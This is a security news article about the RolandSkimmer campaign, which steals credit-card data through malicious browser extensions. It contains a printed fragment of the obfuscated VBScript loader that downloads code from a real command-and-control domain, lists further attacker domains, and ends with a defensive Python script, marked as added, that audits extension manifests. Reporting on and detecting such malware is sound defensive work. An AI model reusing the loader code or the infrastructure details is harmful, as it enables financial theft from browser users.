New Credit Card Skimming Attack Leverages Chrome, Edge, & Firefox Extensions to Steal Financial Data

A sophisticated new credit card skimming operation dubbed “RolandSkimmer” has emerged, targeting users primarily in Bulgaria through malicious browser extensions.

Named after the unique string “Rol@and4You” embedded in its payload, this attack represents a concerning evolution in web-based financial theft techniques.

The malware systematically harvests sensitive payment information from victims while maintaining persistent access to their systems through compromised web browsers.


The attack begins with a deceptive ZIP file named “faktura_3716804.zip” containing a seemingly innocuous shortcut file.

Attack chain (Source – Fortinet)

Once executed, this LNK file initiates a complex chain of obfuscated scripts that establish covert access to the victim’s system.

Unlike traditional skimmers that target e-commerce websites directly, RolandSkimmer focuses on compromising the browsers themselves, creating a persistent threat that follows users across multiple websites.

What makes RolandSkimmer particularly dangerous is its multi-browser approach, simultaneously targeting Google Chrome, Microsoft Edge, and Mozilla Firefox through tailored malicious extensions.

These extensions request extensive permissions including the ability to read all web content, modify network requests, and access browsing data, enabling comprehensive monitoring of victims’ online activities.

The attackers employ sophisticated obfuscation techniques to evade detection, with XOR-encoded payloads and dynamically generated components.

Fortinet researchers identified the campaign in March 2025, documenting how the malware establishes persistence by creating hidden folders and modifying browser shortcuts.

“This represents an alarming trend in financial theft malware,” noted FortiGuard Labs in their recent analysis, highlighting the threat’s sophisticated evasion mechanisms and cross-browser capabilities.

The operators behind RolandSkimmer have constructed an elaborate command and control infrastructure spanning multiple domains, including invsetmx[.]com, exmkleo[.]com, and bg3dsec[.]com.

These servers deliver malicious payloads and serve as collection points for stolen financial data, with each victim assigned a unique tracking identifier to monitor their activity across browsing sessions.

Infection Mechanism and Extension Deployment

The initial infection process begins when users extract and click the malicious LNK file, which executes a heavily obfuscated script chain.

LNK file (Source – Fortinet)

This script connects to the attacker’s server and downloads additional components disguised with false extensions.

One critical component masquerades as a JPEG image (n.jpg) but actually contains VBScript code that executes directly in memory without writing to disk.

Obfuscated VBScript in n.jpg (Source – Fortinet)
on error resume next:q1="8a9b1c3":for q2=1 to 76046:if q7=q6 then:q8="":else:q8=q6:
q7=q6:end if:Set q3=CreateObject("MSXML2.ServerXMLHTTP.6.0"):q3.open "GET",
"http://invsetmx.com/default.aspx?V="&q2&"&R=#-@-"&q8,False:q3.send:q4=Split(
q3.responseText,"-@-"):if q5=q4(1) then:else:q5=q4(1):q9 = "":For w1=1 to Len(q4(1))

The malware then performs system reconnaissance to gather environment details, including checking for installed browsers and hardware specifications.

For Microsoft Edge, it creates a folder at “%APPDATA%..\Local\s2ch97” containing a malicious extension disguised as “Disable Content Security Policy.”

This extension’s manifest requests extensive permissions, including “declarativeNetRequest,” “browsingData,” “tabs,” and “storage.”

The extension’s background scripts monitor form submissions across all websites, specifically targeting credit card numbers. When payment details are detected, the malicious code appends the unique marker “Rol@and4You” to the stolen data and exfiltrates it to remote servers through hidden elements in the page.
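An added defensive example (not code from Fortinet's analysis or from the campaign): a Python audit that walks unpacked browser-extension directories and flags any manifest that combines the permission set described above with all-URL host access or a CSP-disabling name. The two sample manifests are constructed for illustration; the function names are this example's own.

```python
import json
from pathlib import Path

# Permission set the article reports in the malicious Edge extension's manifest.
SKIMMER_PERMS = {"declarativeNetRequest", "browsingData", "tabs", "storage"}
# Match patterns that let an extension read or script every page the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Words in an extension name that advertise CSP tampering ("Disable Content Security Policy").
SUSPECT_NAME_WORDS = ("content security policy", "csp")


def host_patterns(manifest: dict) -> set:
    """Collect every URL match pattern: MV3 host_permissions, MV2 permissions, content_scripts."""
    patterns = set(manifest.get("host_permissions", []))
    patterns |= {p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"}
    for cs in manifest.get("content_scripts", []):
        patterns |= set(cs.get("matches", []))
    return patterns


def audit_manifest(manifest: dict) -> dict:
    """Return the extension name, a list of findings and a score (one point per finding)."""
    findings = []
    perms = set(manifest.get("permissions", []))
    if SKIMMER_PERMS <= perms:
        findings.append("requests the full skimmer permission set: " + ", ".join(sorted(SKIMMER_PERMS)))
    broad = host_patterns(manifest) & BROAD_HOSTS
    if broad:
        findings.append("can read every site the user visits: " + ", ".join(sorted(broad)))
    name = manifest.get("name", "")
    if any(word in name.lower() for word in SUSPECT_NAME_WORDS):
        findings.append(f"name advertises CSP tampering: {name!r}")
    return {"name": name or "<unnamed>", "score": len(findings), "findings": findings}


def audit_unpacked_extensions(root: Path) -> list:
    """Audit every manifest.json under an unpacked-extensions directory, riskiest first."""
    results = [audit_manifest(json.loads(p.read_text(encoding="utf-8")))
               for p in root.rglob("manifest.json")]
    return sorted(results, key=lambda r: r["score"], reverse=True)


# Constructed sample manifests; illustrations only, not artifacts recovered from the campaign.
SKIMMER_LIKE = {"manifest_version": 3, "name": "Disable Content Security Policy",
                "permissions": ["declarativeNetRequest", "browsingData", "tabs", "storage"],
                "host_permissions": ["<all_urls>"],
                "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}]}
BENIGN = {"manifest_version": 3, "name": "Tab Counter", "permissions": ["tabs"],
          "host_permissions": []}

if __name__ == "__main__":
    print(json.dumps([audit_manifest(m) for m in (SKIMMER_LIKE, BENIGN)], indent=2))
```

Point `audit_unpacked_extensions` at a browser profile's extensions directory to triage everything installed; a score of 3 reproduces the combination this article describes, while a single broad-host finding on its own is common for legitimate extensions.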

The careful design of this attack chain enables persistent access without requiring elevated privileges, allowing the attackers to maintain long-term access to victims’ browsers and financial information.


Tushar Subhra Dutta
Tushar is a cybersecurity content editor with a passion for creating captivating and informative content. With years of experience in cybersecurity, he covers cybersecurity news, technology and other news.